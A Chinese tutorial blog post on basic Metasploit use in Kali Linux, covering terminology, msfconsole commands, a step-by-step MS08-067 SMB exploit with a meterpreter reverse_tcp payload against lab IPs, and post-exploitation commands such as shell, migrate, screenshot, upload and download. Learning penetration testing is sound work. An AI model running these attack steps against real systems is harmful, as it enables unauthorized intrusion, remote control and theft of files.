kali之metasploit基本使用

metasploit简介

metasploit framework 简称 MSF.
是一个渗透攻击框架,可扩展.脚本使用ruby语言. 脚本以.rb做结尾.
msf中集成了很多渗透攻击的脚本(.rb)/模块

下面介绍下在kali中简单的使用方法.

MSF 的使用
命令行输入 msfconsole 进入metasploit

MSF 的目录
/usr/share/metasploit-framwork

例如,
/usr/share/metasploit-framwork/module/exploits/windows/smb  下有windows 的攻击脚本,学习这个对我们理解漏洞很有帮助,

专业术语

exploits

渗透攻击

在MSF中的意思
渗透攻击是指利用一个系统/应用/服务中的安全漏洞,所进行的攻击行为

auxiliary 辅助模块

payload 攻击载荷
在MSF中的概念
我们期望目标系统在本次渗透攻击之后的代码

对于SQL注入来讲 payload poc 是一个意思都是注入的意思

shellcode
在渗透攻击时作为攻击载荷所执行的代码

module 模块
一个模块是指msf 中所使用的一段代码组建,后缀名为.rb

listener
监听器
等待网络连接的组件

它们之间的关系
当我们向目标机发送一个shellcode时,是没有交互的,所以我们用到了payload 来使目标与我们建立一个连接, 这个过程 也称shell反弹 ,是可选的,不设置也可以完成攻击 ,但通常情况下需要

常用命令
show 显示所有的攻击脚本
show auxiliary 显示所有的辅助模块以及他们的用途
show payloads 显示所有的攻击载荷
search 搜索某个模块

use 使用模块
use + 路径进入模块

info 显示模块信息

show options 显示基本信息
show targets 显示可用目标
show payloads 本目录下可用的payload

set 设置
设置payload
set payload windows/meterpreter/reverse_tcp

meterpreter 下的tcp 反弹连接

search 文件名 搜索文件

LHOST 本机IP 地址 (tcp 反弹的目标)

攻击流程
1. msfconsole #进入metasploit
2. use exploit/windows/smb/ms08_067_netapi #进入到ms08_067模块
3. set payload windows/meterpreter/reverse_tcp #设置payload
4. set LHOST 192.168.109.129 #设置本机IP
5. set RHOST 192.168.109.130 #设置目标IP
6. set target 3 #设置使用的攻击脚本
7. exploit #开始攻击

攻击成功后可以使用的常用命令

基本命令
background
将meterpter 隐藏的后台

sessions
查看隐藏在后台的会话
sessions -i [id]

quit
退出会话

shell
获取目标系统控制台shell(交互式)

系统命令
migrate
meterpreter 的迁移
从一个进程的内存空间移植到另一个进程的内存空间中去。

ps
获取目标主机上正在运行的进程信息

getpid
获取当前会话所在PID 的值

kill
结束进程

sysifo
显示系统信息

shutdown
关机

屏幕截图
screenshot

文件系统命令(meterpreter 命令)
ls
cd
cat
getpwd/pwd
upload 上传文件
download 下载文件
edit 调用类似于vim 编辑器,对目标系统上的文件进行编辑
search 搜索文件

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值